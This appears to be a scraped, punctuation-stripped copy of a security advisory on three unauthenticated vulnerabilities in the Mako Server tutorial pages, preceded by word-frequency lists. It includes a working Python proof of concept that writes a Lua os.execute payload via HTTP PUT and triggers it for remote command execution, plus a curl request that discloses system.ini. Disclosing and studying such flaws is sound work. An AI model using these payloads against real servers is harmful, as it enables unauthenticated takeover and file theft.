Meta tags:

Headings (most frequently used words):

-

Text of the page (most frequently used words):
the (22), http (13), #request (12), #server (9), #victim (8), lsp (7), and (7), web (7), #mako (7), get (7), #unauthenticated (6), for (6), #page (5), #vulnerability (5), #file (5), #urllib2 (5), put (5), #vulnerabilities (5), hyp3rlinx (5), remote (4), these (4), command (4), windows (4), examples (4), execution (4), execute (4), tutorial (4), disclosure (3), lua (3), with (3), manage (3), ini (3), system (3), add_header (3), response (3), type (3), content (3), securiteam (3), attacker (3), time (3), save (3), john (3), input (3), leads (2), when (2), org (2), can (2), altervista (2), requests (2), credits (2), linux (2), sufficiently (2), sanitizing (2), that (2), true (2), aka (2), not (2), this (2), opener (2), proof (2), concept (2), security (2), cmd (2), makoserver (2), beyond (2), send (2), following (2), write (2), arbitrary (2), are (2), passed (2), port (2), found (2), curl (2), secure (2), advisory (2), will (2), application (2), design (2), developers (2), need (2), connected (2), does, responsible, victims, filesystem, function, saved, import, details, failed, sending, machine, accessing, ssd, 0day, x86_64, without, modification, returned, about, connect, trying, user, agent, redhat, urlopen, gnu, libcurl, openssl, zlib, libidn, host, uri, sleep, print, charset, system32, calc, exe, build_opener, httphandler, data, text, plain, utf, open, requested, xmlhttprequest, referer, localhost, types, clarification, lambda, get_method, license, status, provides, important, users, aware, issues, compact, helps, rapidly, iot, applications, environment, production, from, which, implement, complete, custom, solutions, ideal, embedded, systems, credit, independent, code, basis, has, advisories, https, blogs, com, index, php, archives, 3391, website, source, multiple, used, vulnerabiliities, txt, isr, apparitionsec, summary, describe, three, servers, side, forgery, may, researcher, reported, attempts, allocation, requirement, also, maintenance, contract, place, internally, set, cost, account, notification, billing, against, support, inquiries, its, unclear, whether, going, fixed, further, commercial, formal, securitys, receipt, program, vendor, realtimelogic, was, informed, aug, but, while, acknowledging, information, sent, refused, respond, technical, claims, give, fix, timeline, coordinate, saying, just, accept,

Text of the page (random words):
ssd beyond security https blogs securiteam com index php archives 3391 credits john page a k a hyp3rlinx website hyp3rlinx altervista org source http hyp3rlinx altervista org advisories mako web server multiple unauthenticated vulnerabiliities securiteam txt isr apparitionsec vulnerabilities summary the following advisory describe three 3 vulnerabilities found in mako servers tutorial page the vulnerabilities found are unauthenticated arbitrary file write vulnerability that leads to remote command execution unauthenticated file disclosure unauthenticated server side request forgery as these tutorial may be used as the basis for production code it is important for users to be aware of these issues as a compact application and web server the mako server helps developers rapidly design secure iot and web applications the mako server provides an application server environment from which developers can design and implement complete custom solutions the mako web server is ideal for embedded linux systems credit an independent security researcher john page aka hyp3rlinx has reported this vulnerability to beyond securitys securiteam secure disclosure program vendor response realtimelogic was informed of the vulnerability on aug 13 but while acknowledging the receipt of the vulnerability information refused to respond to the technical claims to give a fix timeline or coordinate an advisory saying i just sent a formal notification for the commercial license requirement and also we need to put a maintenance contract in place internally i need to set up a cost allocation account for billing against these support inquiries at this time its unclear whether these vulnerabilities are going to be fixed and further attempts to get a status clarification failed vulnerabilities details unauthenticated arbitrary file write vulnerability that leads to remote command execution mako web server tutorial does not sufficiently sanitizing the http put requests when an attacker send http put request to save lsp web page the input passed to a function responsible for accessing the filesystem the attacker input will be saved on the victims machine and can be execute by sending http get request to manage lsp http put http victim ip examples save lsp ex 2 1 http get http victim ip examples manage lsp execute true ex 2 1 type lua proof of concept import urllib2 time makoserver v2 5 remote command execution 0day credits john page aka hyp3rlinx print makoserver v2 5 remote command execution cmd os execute c windows system32 calc exe opener urllib2 build_opener urllib2 httphandler request urllib2 request http ip examples save lsp ex 2 1 data cmd request add_header content type text plain charset utf 8 request add_header x requested with xmlhttprequest request add_header referer http localhost lua types lsp request get_method lambda put opener open request time sleep 1 urllib2 urlopen http ip examples manage lsp execute true ex 2 1 type lua unauthenticated file disclosure mako web server tutorial is not sufficiently sanitizing get requests when an attacker send get request to the uri ip fs the input passed without modification and the response with the file content is returned proof of concept the following get request will response with the c windows system ini content curl v http victim ip fs c windows system ini about to connect to victim ip port 80 trying victim ip connected connected to victim ip victim ip port 80 get fs c windows system ini http 1 1 user agent curl 7 15 5 x86_64 redhat linux gnu libcurl 7 15 5 openssl 0 9 8b zlib 1 2 3 libidn 0 6 5 host victim ip accept